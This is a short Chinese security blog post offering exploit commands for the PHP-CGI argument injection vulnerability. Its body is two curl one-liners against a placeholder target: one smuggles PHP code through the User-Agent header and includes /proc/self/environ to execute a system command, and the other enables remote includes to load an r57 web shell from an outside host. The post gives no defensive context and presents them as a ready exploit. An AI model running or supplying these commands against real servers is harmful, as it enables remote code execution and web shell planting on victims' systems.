php-cgi漏洞利用EXP |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

1、本地包含直接执行代码:

curl -H “USER-AGENT: <?system(‘id’);die();?>” http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
 
2、远程包含执行代码:
curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt
 
如图:
php-cgi漏洞利用EXP |

 

Tags:

PHP漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
php-cgi漏洞利用EXP |